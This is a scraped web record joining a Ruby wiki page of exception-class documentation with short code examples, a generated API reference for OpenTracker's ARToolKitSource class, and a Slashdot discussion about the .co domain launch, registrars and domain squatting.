Upcoming Documentation for Exception Classes¶
NoMemoryError
Raised when memory allocation fails.
ScriptError
ScriptError is the superclass for errors raised when a script can not be executed because of a +LoadError+, +NotImplementedError+ or a +SyntaxError+. Note these type of +ScriptErrors+ are not +StandardExceptions+ and will not be rescued unless it is specified explicitly (or its ancestor +Exception+).
LoadError
Raised when a file required (a Ruby script, extension library, ...) fails to load.
require 'this/file/does/not/exist' # => LoadError: no such file to load -- this/file/does/not/exist
NotImplementedError
Raised when a feature is not implemented on the current platform. For example, methods depending on the +fsync+ or +fork+ system calls may raise this exception if the underlying operating system or Ruby runtime does not support them.
SyntaxError
Raised when encountering Ruby code with an invalid syntax.
eval("1+1=2") # => SyntaxError: (eval):1: syntax error, unexpected '=', expecting $end
SecurityError
Raised when attempting a potential unsafe operation (typically when the $SAFE level is raised above 0)
foo = "bar"
proc = Proc.new do
$SAFE = 4
foo.gsub! "a", "*"
end
proc.call # => SecurityError: Insecure: can't modify string
SignalException
Raised when a signal is received, for example by Process.kill
begin
Process.kill('HUP',Process.pid)
rescue SignalException => e
puts "received Exception #{e}"
end
==> received Exception SIGHUP¶
Interrupt
Raised with the interrupt signal is received, typically because the user pressed on Control-C (on most posix platforms). As such, it is a subclass of +SignalException+.
begin
puts "Press ctrl-C when you are bored"
loop {}
rescue Interrupt => e
puts "Note: You will typically use Signal.trap instead."
end
StandardError
The most standard error types are subclasses of StandardError. A rescue clause without an explicit Exception class will rescue all StandardErrors (and only those).
do_something_that_raises_a_standard_error rescue "Hello"
=> "Hello"¶
require 'does/not/exist' rescue "Hi"
=> LoadError: no such file to load -- does/not/exist¶
ArgumentError
Raised when the arguments are wrong and there isn't a more specific Exception class. For example, passing the wrong number of arguments or a value that is not acceptable will typically raise an ArgumentError.
[1, 2, 3].first(4, 5) # => ArgumentError: wrong number of arguments (2 for 1)
[1, 2, 3].first(-4) # => ArgumentError: negative array size
FiberError
Raised when an invalid operation is attempted on a Fiber, in particular when attempting to call/resume a dead fiber,attempting to yield from the root fiber, or calling a fiber across threads.
fiber = Fiber.new{}
fiber.resume # => nil
fiber.resume # => FiberError: dead fiber called
IndexError
Raised when the given index is invalid.
a = [:foo, :bar]
a.fetch(0) # => :foo
a[2] # => nil
a.fetch(2) # => IndexError: index 2 out of array
KeyError
Raised when the specified key is not found. It is a subclass of IndexError.
h = {:foo => :bar}
h.fetch(:foo) # => :bar
h.fetch(:baz) # => KeyError: key not found
StopIteration
Raised to stop the iteration, in particular by Enumerator#next. It is rescued by Kernel#loop.
loop do
puts "Hello"
raise StopIteration
puts "World"
end
puts "Done!"
=> Outputs "Hello" and "Done!"¶
IOError
Raised
EOFError
Raised
LocalJumpError
Raised when Ruby can't yield as requested.
def call_block
yield 42
end
call_block # => LocalJumpError: no block given (yield)
def get_me_a_return
Proc.new { return 42 }
end
get_me_a_return.call # => LocalJumpError: unexpected return
NameError
Raised when a given name is invalid or undefined.
puts foo # => NameError: undefined local variable or method `foo' for main:Object
Fixnum.const_set :answer, 42 # => NameError: wrong constant name answer
NoMethodError
Raised when a method is called on a receiver which doesn't have it defined and also fails to respond with +method_missing+.
"hello".to_ary # => NoMethodError: undefined method `to_ary' for "hello":String
RangeError
Raised when a given numerical value is out of range.
[1, 2, 3].drop(1 << 100) # RangeError: bignum too big to convert into `long'
FloatDomainError
Raised when attempting to convert special float values (infinite or NaN) to numerical classes which don't support them.
Float::INFINITY.to_r # => FloatDomainError: Infinity
RegexpError
Raised when given an invalid regexp expression.
Regexp.new("?") # => RegexpError: target of repeat operator is not specified: /?/
RuntimeError
Raised when an invalid operation is attempted.
Kernel.raise will raise a RuntimeError if no Exception class is specified.
raise "ouch" # => RuntimeError: ouch
[1, 2, 3].freeze << 4 # => RuntimeError: can't modify frozen array
SystemCallError
SystemCallError is the base class for all low-level platform-dependent errors.The errors available on the current platform are subclasses of SystemCallError and are defined in the Errno module.
File.open("does/not/exist") # => Errno::ENOENT: No such file or directory - does/not/exist
ThreadError
Raised when an invalid operation is attempted on a thread.
Thread.stop # => ThreadError: stopping only thread
TypeError
Raised when encountering an object that is not of the expected type.
[1, 2, 3].first("two") # => TypeError: can't convert String into Integer
ZeroDivisionError
Raised when attempting to divide an integer by 0.
42 / 0 # => ZeroDivisionError: divided by 0
42 / 0.0 # => Float::INFINITY
SystemExit
Raised by exit to initiate the termination of the script.
SystemStackError
Raised in case of a stack overflow.
def me_myself_and_i
me_myself_and_i
end
me_myself_and_i # => SystemStackError: stack level too deep
Encoding::CompatibilityError
Raised by Encoding and String methods when the source encoding is incompatible with the target encoding.
Encoding::ConverterNotFoundError
Raised by transcoding methods when a named encoding does not correspond with a known converter.
Encoding::UndefinedConversionError
Raised by Encoding and String methods when a transcoding operation fails.
Encoding::InvalidByteSequenceError
Raised by Encoding and String methods when the string being transcoded contains a byte invalid for the either the source or target encoding. | https://bugs.ruby-lang.org/projects/ruby/wiki/ExceptionClassesDoc | CC-MAIN-2016-07 | en | refinedweb |
ot::ARToolKitSource Class ReferenceAn ARToolKitSource represents a single marker that is tracked by the artoolkit library.
More...
[Device Input Classes]
#include <ARToolKitSource.h>
Inheritance diagram for ot::ARToolKitSource:
Detailed DescriptionAn ARToolKitSource represents a single marker that is tracked by the artoolkit library.
Definition at line 74 of file ARToolKitSource.h.
Constructor & Destructor Documentation
constructor method
- Parameters:
-
Definition at line 96 of file ARToolKitSource.h.
Member Function Documentation
tests for EventGenerator interface being present.
Is overriden to return 1 always.
- Returns:
- always 1
Reimplemented from ot::Node.
Definition at line 110 of file ARToolKitSource.h.
Friends And Related Function Documentation
Definition at line 113 of file ARToolKitSource.h.
Definition at line 116 of file ARToolKitSource.h.
Member Data Documentation
buffer variable for grabbing thread
Definition at line 79 of file ARToolKitSource.h.
center of the marker
Definition at line 85 of file ARToolKitSource.h.
the event pushed into the tree
Definition at line 79 of file ARToolKitSource.h.
marker id from the artoolkit library
Definition at line 83 of file ARToolKitSource.h.
is a new update ready in the buffer ?
Definition at line 89 of file ARToolKitSource.h.
size of the marker
Definition at line 87 of file ARToolKitSource.h.
The documentation for this class was generated from the following file: | http://studierstube.icg.tugraz.at/opentracker/html/classot_1_1ARToolKitSource.php | CC-MAIN-2016-07 | en | refinedweb |
I have this problem about queues. :(So this is my problem.
Given an array of characters of specified size, store a string into the ar...
Queuei'm not a very good coder. i'm really really a newbie. forgive me but i don't really understand that...
Queue[code]
/* Implementation of a circular queue of Array containg names.. */
# include <stdio.h>
# incl...
Elementsvlad from moscow - thank you for the idea. ;)
ElementsI figured it out. Thank you all for the help. :)
This user does not accept Private Messages | http://www.cplusplus.com/user/EJ_Destua/ | CC-MAIN-2016-07 | en | refinedweb |
in reply to
Re: decomposing binary matrices
in thread decomposing binary matrices
Thanks, I tried drawing the graph on a piece of paper, and while I'm not yet sure I think it may be possible to say that: the graph for any undecomposable submatrix has a cycle that traverses all its nodes; and that: the nodes in the longest cycle form the largest undecomposable submatrix. Thus from the example in the OP, you can get cycles A-2-E-4-A and B-3-C-1-D-5-B, but there is no cycle looping through all 10 of the nodes.
That does not immediately help, since Graph will only find "the first cycle" - I can't tell from the docs (nor from a brief look at the code), but I suspect that since all my edges are undirected, it will just immediately return (eg) A-2-A as a cycle - but this concept may well help me search for an algorithm.
Update: this page tells me:
Finding the longest cycle in a graph includes the special case of Hamiltonian cycle (see gif), so it is NP-complete.
Hugo
That was the reason I suggested the Mastering Algorithms with Perl book. It dealt quite a few algorithms and devotes a chapter to matrices. It also goes into great detail for several different methods for using Graph.
Graph by itself is not very useful because it is expected that you know what your are doing, which I find frustrating when I encounter a problem. But there is a lot more to it than first appearances would suggest.
Lots
Some
Very few
None
Results (222 votes),
past polls | http://www.perlmonks.org/index.pl?node_id=600448 | CC-MAIN-2016-07 | en | refinedweb |
This happening in the background.
In the previous article “Java SE 8 new features tour: The Big change, in Java Development world”, where I have talked about what we are going to explore during this series. I have started by an introduction to Java SE 8 main features, followed by installation process of JDK8 on both Microsoft windows and Apple Mac OS X platforms, with important advices and notice to take care of.
Finally, we went through a development of a console application powered by Lambda expression to make sure that we have installed Java SE 8 probably.
Source code is hosted on my Github account: Clone from HERE.
What is Lambda expression?
Perhaps the best-known new feature of Java SE 8 is called Project Lambda, an effort to bring Java into the world of functional programming.
In computer science terminology;
A Lambda is an anonymous function. That is, a function without a name.
In Java;
All functions are members of classes, and are referred to as methods. To create a method, you need to define the class of which it’s a member.
A lambda expression in Java SE 8 lets you define a class and a single method with very concise syntax implementing an interface that has a single abstract method.
Let’s figure out the idea.
Lambda Expressions lets developers simplify and shorten their code. Making it more readable and maintainable. This leads to remove more verbose class declarations.
Let’s take a look at a few code snippets.
- Implementing an interface: Prior to Java SE 8, if you wanted to create a thread, you’d first define a class that implements the runnable interface. This is an interface that has a single abstract method named Run that accepts no arguments. You might define the class in its own code file. A file named by MyRunnable.java. And you might name the class, MyRunnable, as I’ve done here. And then you’d implement the single abstract method.
public class MyRunnable implements Runnable { @Override public void run() { System.out.println("I am running"); } public static void main(String[] args) { MyRunnable r1 = new MyRunnable(); new Thread(r1).start(); } }
In this example, my implementation outputs a literal string to the console. You would then take that object, and pass it to an instance of the thread class. I’m instantiating my runnable as an object named r1. Passing it to the thread’s constructor and calling the thread’s start method. My code will now run in its own thread and its own memory space.
- Implementing an inner class: You could improve on this code a bit, instead of declaring your class in a separate file, you might declare it as single use class, known as an inner class, local to the method in which it’s used.
public static void main(String[] args) { Runnable r1 = new Runnable() { @Override public void run() { System.out.println("I am running"); } }; new Thread(r1).start(); }
So now, I’m once again creating an object named r1, but I’m calling the interface’s constructor method directly. And once again, implementing it’s single abstract method. Then I’m passing the object to the thread’s constructor.
- Implementing an anonymous class: And you can make it even more concise, by declaring the class as an anonymous class, so named because it’s never given a name. I’m instantiating the runnable interface and immediately passing it to the thread constructor. I’m still implementing the run method and I’m still calling the thread’s start method.
public static void main(String[] args) { new Thread(new Runnable() { @Override public void run() { System.out.println("I am running"); } }).start(); }
- Using lambda expression: In Java SE 8 you can re-factor this code to significantly reduce it and make it a lot more readable. The lambda version might look like this.
public static void main(String[] args) { Runnable r1 = () -> System.out.println("I am running"); new Thread(r1).start(); }
I’m declaring an object with a type of runnable but now I’m using a single line of code to declare the single abstract method implementation and then once again I’m passing the object to the Thread’s constructor. You are still implementing the runnable interface and calling it’s run method but you’re doing it with a lot less code. In addition, it could be improved as the following:
public static void main(String[] args) { new Thread(() -> System.out.println("I am running")).start(); }
Here is an important quote from an early specs document about Project Lambda.
Lambda expressions can only appear in places where they will be assigned to a variable whose type is a functional interface.
Quote By Brian Goetz
Let’s break this down to understand what’s happening.
What are the functional interfaces?
A functional interface is an interface that has only a single custom abstract method. That is, one that is not inherited from the object class. Java has many of these interfaces such as Runnable, Comparable, Callable, TimerTask and many others.
Prior to Java 8, they were known as Single Abstract Method or SAM interfaces. In Java 8 we now call them functional interfaces.
Lambda Expression syntax:
This lambda expression is returning an implementation of the runnable interface; it has two parts separated by a new bit of syntax called the arrow token or the Lambda operator. The first part of the lambda expression, before the arrow token, is the signature of the method you’re implementing.
In this example, it’s a no arguments method so it’s represented just by parentheses. But if I’m implementing a method that accepts arguments, I would simply give the arguments names. I don’t have to declare their types.
Because the interface has only a single abstract method, the data types are already known. And one of the goals of a lambda expression is to eliminate unnecessary syntax. The second part of the expression, after the arrow token, is the implementation of the single method’s body.
If it’s just a single line of code, as with this example, you don’t need anything else. To implement a method body with multiple statements, wrap them in braces.
Runnable r = ( ) -> { System.out.println("Hello!"); System.out.println("Lambda!"); };
Lambda Goals:
Lambda Expressions can reduce the amount of code you need to write and the number of custom classes you have to create and maintain.
If you’re implementing an interface for one-time use, it doesn’t always make sense to create yet another code file or yet another named class. A Lambda Expression can define an anonymous implementation for one time use and significantly streamline your code.
Defining and instantiating a functional interface
To get started learning about Lambda expressions, I’ll create a brand new functional interface. An interface with a single abstract method, and then I’ll implement that interface with the Lambda expression.
You can use my source code project “JavaSE8-Features” hosted on github to navigate the project code.
Method without any argument, Lambda implementation
In my source code, I’ll actually put the interface into its own sub-package ending with lambda.interfaces. And I’ll name the interface, HelloInterface.In order to implement an interface with a lambda expression, it must have a single abstract method. I will declare a public method that returns void, and I’ll name it doGreeting. It won’t accept any arguments.That is all you need to do to make an interface that’s usable with Lambda expressions. If you want, you can use a new annotation, that’s added to Java SE 8, named Functional Interface.
/** * * @author mohamed_taman */ @FunctionalInterface public interface HelloInterface { void doGreeting(); }
Now I am ready to create a new class UseHelloInterface under lambda.impl package, which will instantiate my functional interface (HelloInterface) as the following:
/** * @author mohamed_taman */ public class UseHelloInterface { public static void main(String[] args) { HelloInterface hello = ()-> out.println("Hello from Lambda expression"); hello.doGreeting(); } }
Run the file and check the result, it should run and output the following.
------------------------------------------------------------------------------------ --- exec-maven-plugin:1.2.1:exec (default-cli) @ Java8Features --- Hello from Lambda expression ------------------------------------------------------------------------------------
So that’s what the code can look like when you’re working with a single abstract method that doesn’t accept any arguments. Let’s take a look at what it looks like with arguments.
Method with any argument, Lambda implementation
Under lambda.interfaces. I’ll create a new interface and name it CalculatorInterface. Then I will declare a public method that returns void, and I will name it doCalculate, which will receive two integer arguments value1 and value2.
/** * @author mohamed_taman */ @FunctionalInterface public interface CalculatorInterface { public void doCalculate(int value1, int value2); }
Now I am ready to create a new class Use CalculatorInterface under lambda.impl package, which will instantiate my functional interface (CalculatorInterface) as the following:
public static void main(String[] args) { CalculatorInterface calc = (v1, v2) -> { int result = v1 * v2; out.println("The calculation result is: "+ result); }; calc.doCalculate(10, 5); }
Note the doCalculate() arguments, they were named value1 and value2 in the interface, but you can name them anything here. I’ll name them v1 and v2. I don’t need to put in int before the argument names; that information is already known, because the compiler can infer this information from the functional interface method signature.Run the file and check the result, it should run and output the following.
------------------------------------------------------------------------------------ --- exec-maven-plugin:1.2.1:exec (default-cli) @ Java8Features --- The calculation result is: 50 ------------------------------------------------------------------------------------ BUILD SUCCESS
Always bear in mind the following rule:
Again, you have to follow that rule that the interface can only have one abstract method. Then that interface and its single abstract method can be implemented with a lambda expression.
Using built-in functional interfaces with lambdas
I’ve previously described how to use a lambda expression to implement an interface that you’ve created yourself.Now, I’ll show lambda expressions with built in interfaces. Interfaces that are a part of the Java runtime. I’ll use two examples. I’m working in a package called lambda.builtin, that’s a part of the exercise files. And I’ll start with this class. UseThreading. In this class, I’m implementing the Runnable interface. This interface’s a part of the multithreaded architecture of Java.My focus here is on how you code, not in how it operates. I’m going to show how to use lambda expressions to replace these inner classes. I’ll comment out the code that’s declaring the two objects. Then I’ll re-declare them and do the implementation with lambdas. So let’s start.
public static void main(String[] args) { //Old version // Runnable thrd1 = new Runnable(){ // @Override // public void run() { // out.println("Hello Thread 1."); // } //}; /* ***************************************** * Using lambda expression inner classes * ***************************************** */ Runnable thrd1 = () -> out.println("Hello Thread 1."); new Thread(thrd1).start(); // Old Version /* new Thread(new Runnable() { @Override public void run() { out.println("Hello Thread 2."); } }).start(); */ /* ****************************************** * Using lambda expression anonymous class * ****************************************** */ new Thread(() -> out.println("Hello Thread 2.")).start(); }
Let’s look at another example. I will use a Comparator. The Comparator is another functional interface in Java, which has a single abstract method. This method is the compare method.Open the file UseComparator class, and check the commented bit of code, which is the actual code before refactoring it to lambda expression.
public static void main(String[] args) { List<string> values = new ArrayList(); values.add("AAA"); values.add("bbb"); values.add("CCC"); values.add("ddd"); values.add("EEE"); //Case sensitive sort operation sort(values); out.println("Simple sort:"); print(values); // Case insensetive sort operation with anonymous class /* Collections.sort(values, new Comparator<string>() { @Override public int compare(String o1, String o2) { return o1.compareToIgnoreCase(o2); } }); */ // Case insensetive sort operation with Lambda sort(values,(o1, o2) -> o1.compareToIgnoreCase(o2)); out.println("Sort with Comparator"); print(values); }
As before, it doesn’t provide you any performance benefit. The underlying functionality is exactly the same. Whether you declare your own classes, use inner or anonymous inner classes, or lambda expressions, is completely up to you.
In the next article of this series, we will explore and code how to traverse the collections using lambda expression, filtering collections with Predicate interfaces, Traversing collections with method references, implementing default methods in interfaces, and finally implementing static methods in interfaces. | http://www.javacodegeeks.com/2014/07/java-se-8-new-features-tour-functional-programming-with-lambda-expression.html | CC-MAIN-2016-07 | en | refinedweb |
Search Type: Posts; User: veenvliet.morion
Search: Search took 0.10 seconds.
- 3 Jun 2012 11:01 PM
- Replies
- 2
- Views
- 1,747
With ext-all.js and ext-all-debug.js everything is fine.
With ext.js and ext-debug.js thing go wrong on setting the innerHTML.
- 1 Jun 2012 3:46 AM
- Replies
- 2
- Views
- 1,747
Hi,
I've got a problem.
I use Ext.Loader extensivly, and only load ext-debug.js.
In all browsers this works great, but on IE9 I got an error on setting innerHTML in (and some other places).
It...
- 19 Apr 2012 12:12 AM
Your web.config is like it should be?
You have Ext.Direct... namespace included in your controller class files?
- 18 Apr 2012 11:51 PM
Does this work?
GET
Ext.Direct for ASP.Net MVC uses the Router mechanism MVC uses. (kinda ;) ).
Just check the example with Firebug or Webkit Dev tools to see...
- 3 Apr 2012 11:37 PM
- Replies
- 7
- Views
- 2,856
Yep, that seems to work!
I added totalCount = 0 to the sort function aswell. 'Cause I have the same problem with sorting.
// because prefetchData is stored by index
// this...
- 3 Apr 2012 6:11 AM
- Replies
- 7
- Views
- 2,856
I've exactly the same issue.
Using Ext.Direct.
I think it is a bug. 'Cause the store will not prefetch, because it thinks it has all the data. Which is true. But we want new data. :)
Is this...
- 3 Oct 2011 3:53 AM
- Replies
- 14
- Views
- 3,365
Ook geïnteresseerd! Ligt er wel een beetje aan wanneer...
- 10 Jun 2011 6:19 AM
- Replies
- 99
- Views
- 26,187
Klinkt goed.
Met de trein bereikbaar? Dat zou heel mooi zijn.
- 23 May 2011 5:18 AM
- Replies
- 99
- Views
- 26,187
Hey guys,
Interessant! Ik zie deze thread nu ook pas, maar ben zeker geinteresseerd in een vervolg.
Ik werk dagelijks met ExtJS 3.3 icm ASP.Net MVC. Ik kan ook zeker wat laten zien!
Binnenkort...
- 28 Feb 2011 5:30 AM
- Replies
- 7
- Views
- 5,242
I'm not sure, but if you have all javascript run through the compiler, and there is no external (from html onclick or what ever) source that will be calling a javascript function, there should not be...
- 11 Feb 2011 6:13 AM
- Replies
- 27
- Views
- 14,892
Livegrid is fixed in a 0.5 branche!!
- 19 Nov 2010 6:50 AM
Interesting method. But does your controller still give back all the requested data? That would be a security hole, I think?
- 18 Nov 2010 7:29 AM
You don't use membership at all? How do you do authentication, and working with [Authorize] Attribute?
Because of the [Authorize] attribute I work with the membership provider, or do you have...
- 17 Aug 2010 5:15 AM
- Replies
- 3
- Views
- 2,174
You mean in Sencha Touch?
I searched, but did not found it. But it would be great to have it!!!
Because then I can convert quite easily my ExtJS app to Sencha Touch.
- 7 Jun 2010 1:59 AM
- Replies
- 4
- Views
- 2,240
Looks quite good.
I detected one bug.
In the example "Slider with multiple thumbs" just click on the slider (not thumb) right of the last thumb. The first thumb will change to the clicked position,...
- 14 Jan 2010 5:17 AM
- Replies
- 79
- Views
- 34,738
Looking sharp!!!
One suggestion to make it more work like google chrome like explained here:...
- 7 Jan 2010 7:44 AM
- Replies
- 834
- Views
- 378,266
Hi,
Do you see a change to implement a DirectStore for BufferedStore.
I created my own, but maybe it's a good thing to include it in to the mainbranche.
Keep up the good work.
PS: I...
- 27 Nov 2009 12:07 AM
ouch, totally missed that one.
Thanks!
- 26 Nov 2009 12:26 AM
Hi,
Thanks for your reaction (by the way, this is my business/ premium account. In private I'm maxigroovy :) )
The Gzip is only a matter of adding the header to the response. IIS will take care...
- 25 Nov 2009 4:37 AM
Great work.
I haven't had the time to test the new 0.8 version. But I think it's a great step forwards.
I have another request (or is it already implemented?).
Would it be possible to use gzip...
- 22 Nov 2009 11:40 PM
- Replies
- 10
- Views
- 4,438
Thanks for fixing this.
A little tip: you can use IEtester :
for testing with different IE version from one application.
- 19 Nov 2009 1:51 AM
- Replies
- 10
- Views
- 4,438
Looks great. And misses in the basis set of extensions.
What's your license? Free to use? Even in commercial projects? BSD or GPL license?
Can you make a zip package of the source please? You can...
- 18 Nov 2009 12:31 AM
- Replies
- 834
- Views
- 378,266
Hey,
The dhtmlx example on
Loads around 17 items per request/ scroll action. That are a lot of...
- 12 Nov 2009 12:38 AM
- Replies
- 5
- Views
- 3,508
Hi,
I cannot answer your question, but I am interested in your changes/ updates. Sometime the buttons (Update/ Save & Cancel) are rendered on the row I'm editing. Is that one of the bugs you fixed?...
Results 1 to 24 of 24 | https://www.sencha.com/forum/search.php?s=56f90f82d3a1873e1ddc3c06f3cc3227&searchid=14269954 | CC-MAIN-2016-07 | en | refinedweb |
>>.
citibank.co (Score:5, Funny)
now with moar than $100 billion in frictionless laundered money. That's what we call
.colocation!
GoDaddy stories on Slashdot ."
What registrar would you recommend? (Score:4, Interesting)
Re: (Score:3, Interesting)
Re: (Score:3, Informative)
gandi.net
Re: (Score:3, Informative)
Re: (Score:2)
I've been registering with 1&1 for years now. I have a free hosting account (developer preview) from 5 years ago. In any case, they charge $10 a year for
.com - used to be $6 a year.
NearlyFreeSpeech (Score:2) is the best registrar and webhost anywhere. Rock bottom prices, clean website, and absolutely no bullshit. Just sayin' as a satisfied customer for three years.
Re: (Score:2)
Re: (Score:2)
I had about 30 domains with GoDaddy, and was very unhappy with their user interface and customer service. I wanted to be able to make mass changes to the domains, such as name servers. I tried a few different ones and settled on gkg.net [gkg.net]. It's not the prettiest, but it's inexpensive and reliable, and the website UI is simple (no crazy Ajax, Flash interface, browser requirements, etc). For my highly important business domains, I went with DynDNS [dyndns.com], which is slightly more expensive, but has a clean and beautiful
Re: (Score:2)
I've been very happy with gandi.net. [gandi.net]
Namecheap (Score:5, Informative)
I've been using Namecheap for years, and they've been pretty awesome. They have a nice set of DNS management tools, they notify me of all important things, and as their name implies, they're inexpensive.
Another thing I like about Namecheap is that you can delegate control over your names to other people. I run a suite of hobby gaming web sites, and I've made contingency plans in case I get hit by a proverbial bus. (Or a real one.) I've given one of the other site admins permissions over the names so that if need be, he can manage them or even move them to another registrar. Obviously, I trust him implicitly, but the point is that if something happens to me, the names aren't just up for grabs once the registration expires. They may exist, but I don't know of another registrar that allows you to delegate permissions like this.
I can't speak about their technical support; I've never had to use it.
Just to prove I'm not a shill for the company (I'm only affiliated with them as being a customer), if there's one thing that's stupid about them, it's their name. I mean, "Namecheap"? Makes them sound so, I dunno, Wal-Martish, especially given what has been a good record so far with me.
Re: (Score:2)
I agree - I host over 100 domains through Namecheap, and have never had any problem with them. I left GoDaddy because of their PlaySkool, Javascript intense interface, long before I had enough domains to be worried about the privacy and security implications.
I also like money. A lot. In that line, here's an affiliate link to Namecheap [namecheap.com] that might make me some
:)
Re: (Score:2, Informative)
That's what I did, and now my company provides and sells domains to all of our website design customers as a part of our packages.
Why go to a secondary reseller, when you can become one yourself and take out a middle man.
Re: (Score:2)
I'll look into this - thanks
:)
I don't do much web development these days, but this is still worth checking into.
Re: (Score:2)
I can speak for NameCheap's technical support. They are quick and helpful. I only have certificates with them, but it's an ever-growing number
:)
I have a reseller account with some other company for domains, which is tens of cents cheaper per domain (special offers not included). The only difference between going through NameCheap and reseller accounts is that the latter normally requires a little deposit. If they need no deposit, they're usually slightly more expensive. For just a few domains I'd go with N
Re: (Score:2)
I can second the Namecheap recommendation. I moved my registration and hosting/email of my dozen domains from Godaddy to Namecheap last year and have been very satisfied.
Re: (Score:2)
Re: (Score:3, Funny)
What do you mean by "weird domains"? Are you referring to something like "ifuckfishinmydreams.com" where the name itself is weird or "nationalreview.com" where all the writers are weird, or "lookbook.nu" where the idea is weird or...?
(Note: "ifuckfishinmydreams.com" is not a real website. But it you're interested in owning that domain, drop me an email. We can talk.)
It's not mined out. (Score:5, Informative)
It's squatted, sniped, tasted, and front-run out.
When a speculator can register thousands of names and move them around for free by playing the system, is there any wonder that
.com is "mined out"? When a registrar front-runs domain names (Network Solutions) and fills the space with reserved names for itself, is there any wonder that .com is "mined out"?
Get rid of domain tasting and other shenanigans and the problem will go away.
--
BMO
Re: (Score:3, Informative)
This.
Also 'investors'. A little while back I read an online article by someone congratulating themselves on investing in
.com names. He was going through a dictionary, finding obscure words and testing to see if they were available, then buying them up. He had about 30 dictionary words and he was going to make money on the idea, also encouraging others to do the same.
It's one of those times when you wish you could reach through the screen and strangle the person on the other side. Squatters, 'investors' and: (Score:2)
I know that WWW ist just one of many services. And a definition of "use" (or better of what kind of behaviour leads to losing the domain) that eliminates most of the speculants and cybersquatters but doesn't hurt other people shouldn't be too difficult to find.
And if it's only done on request by someone with serious interest in using the domain, there would be no need to "visit millions of websites".
Re: (Score:2)
I doubt it. Accepting email (and then ignoring it) costs the "speculants and cybersquatters" nothing - they just point them all at the same mail server just as they do with the web servers.
Plus, why is putting up a page of advertisements not "using"?
Re: (Score:2)
I doubt it. Accepting email (and then ignoring it) costs the "speculants and cybersquatters" nothing - they just point them all at the same mail server just as they do with the web servers.
Oh my. Just imagine this: guy wants to register $HISNAME-software.com that is taken by a domain grabber. Guy goes to some kind of ombudsman who gives the thing a closer look and easily sees that the running mailserver is just an alibi. Domain will be transferred, grabber maybe fined.
Sure, you could never really get all of them, if we make sure not to have "false positives", but why shouldn't we at least get rid of the big ones, where it is easy to proove?
Plus, why is putting up a page of advertisements not "using"?
Because of the missing content?!
Re: (Score:2)
Flamebait? Seriously? What a stupid mod.
Re: (Score:2)
The easy solution would be a "use it or lose it" rule where the ownership of a domain that is just parked will be revoked when someone else would like to register it.
It is non-trivial to define "parked" in regards to a domain name in a way that is fair. I have 2
.com domains registered. One I've used since the price of a .com name was writing a justification memo to the InterNIC. I registered the other one in the late 90's when I thought I might want to migrate off the old one (complicated story) but I've never done so. My old registrar consideredd both of those domains "parked" simply because I didn't use their DNS servers for either of them, but in fact the old domai
Re: (Score:2)
Oh, "registering a domain in order to treat it as a good to be sold", maybe with an added "especially when not making any real use in terms of running stuff like websites, mail, ssh, VPN,
..." seems like a good starter to me.
And in your case, I would suspect that - assuming your business is not selling domains - your (businesses') name or what you do and the domain name give clear evidence that you had no malicious intent.
Re: (Score:2)
So what? That scheme would be obvious enough. They would have to come up with more complexity in the generated pages, register the domains to many different real people and so on. Maybe we'll have to add fines for "professional" parkers in the recipe.
OK, I admit that it's no sooo easy. But it would be a huge advancement to the situation now without being technically unrealistic.
And there is one thing I forgot: any abuse of domain tasting must be severely punished.
Re: (Score:2)
I wouldn't be against the prices being raised back to former levels across all top level names. For those who have a legitimate use for the name, the cost is still not that high, but high enough to force squatters to rethink their approach. registe.
People may not be paying (Score:5, Interesting)
The squatters may just think people will pay. Remember that for something like this to happen there doesn't have to be an actual worthwhile market, just the perception of one. You get all kinds of dumb, greedy, people who get in to shit.
A great example is back in the day when eBay was young and some domain squatters decided to buy up domains they thought might be worthwhile and try to sell them. So the funniest one I came across was a guy who had registered generalmills.cc and wanted to sell it for $10,000,000. That's right, ten million dollars. His sales pitch was you could buy it and then "Make them pay whatever you liked for the rights." Of course General Mills happily owned generalmills.com at the time and didn't seem to have an interest in others. What's more, a company can nab a domain name that is their trademark if they wish (these days through ICANN, back then through the courts). I e-mailed him calling him an idiot more or less and got one of the most caustic, hate filled responses defending his business claiming he made millions "regularly" on sales. I pointed out to him that he had no sales on eBay thus far, and got more hate in response.
It was quite clear that he though he'd got a brilliant scam, which was successful only in his own mind. He was just waiting for his big payday... Which of course never came..
Re: (Score:2)
Wow, lol. This wasn't a month ago, and it was squatted. Purchased, and thanks!
Re: (Score:2)
Yes, but most often that's in use, which is a different thing.
Re: (Score:2)
Re: (Score:2)
By burned down buildings..
Re: (Score:2)
Re: (Score:2)
Sheep? I take it you don't utilize any thermostats in the heating of your house? Shun automatic transmission?
For that matter, why not remember and write in IP in the browser bar?
Re: (Score:2)
Re: (Score:2)
For that matter, why not remember and write in IP in the browser bar?
Flashbacks to SUN terminal rooms in college; having a notebook half-filled with IP addresses, passed from person to person, because only the CS grad students got printer time...good times.
Re: (Score:2)
To get to slashdot.org (I don't use facebook), I hit Ctrl+T, then the letter s, then the right arrow key, then enter. Once you've been to a site once, you barely need to think at all these days.
Re: (Score:2)
Re: (Score:2)
1) Send neural impulses to direct your right arm such that said arm is above the keyboard. You may, if you wish, separate your eyelids so that you might see when you are successful in this.
2) Send more neural impulses to move your thumb right over the key the light reflecting off of which forms the letters Ctrl upside down on your retina. Similarly move your pinky finger right over the key that looks like a T. Note that although pressing the key normally places a lowercase t on the screen, the key is still
Re: (Score:2)
> browser does a swift “I'm feeling lucky” search
Umm... Maybe this changed, but the last time I checked, Firefox tries
.com and a few other toplevels until one resolves.
Re: (Score:3, Informative)
Actually, the reason Google knows that bit more about sites people visit, is that Firefox, Chrome and Safari all send each and every domain you visit to Google's Safebrowsing servers before they connect to it.
That is not how SafeBrowsing works. Firefox downloads a large database of hash prefixes. If the hashes of the domain and url are not in the list you go to the site and nothing is sent to Google. If the first bit of the hash matches an entry in the list Firefox asks Google for the list of complete hashes that start with that prefix. If the site's hash matches then you're blocked, if it doesn't you're not, but nothing more is sent.
To further obfuscate things, when Firefox finds a prefix match it doesn't just
Re: (Score:2, Redundant)
So the only reason that you are against it is so you do not need to pay more for another domain name. And yet by registering three daomain names (com, net, org) you and almost everybody else are using up those names.
I always thought these com, net, org and all others are not a good idea. The best would have been to just use the ones for each country. That would have made this site slashdot.us. "But what about international organizations like debian?" I hear you ask. Well, either take the one where the organ
Re: (Score:2)
Here is proof, in the form of a registry desperatly trying and failing to get people to buy
Re: (Score:2)
Re: (Score:3, Interesting)
It's the manner in which the girls are selling domains.
I don't mind girls in commercials. Even sexy girls in commercials, if it's appropriate for the product. For example, beer, which is traditionally a "macho" drink, or Axe bodywash, or Victoria's Secret (who, contrary to common sense, are targeting their ads mainly at men that buy those sexy clothes for their girlfriends/wives).
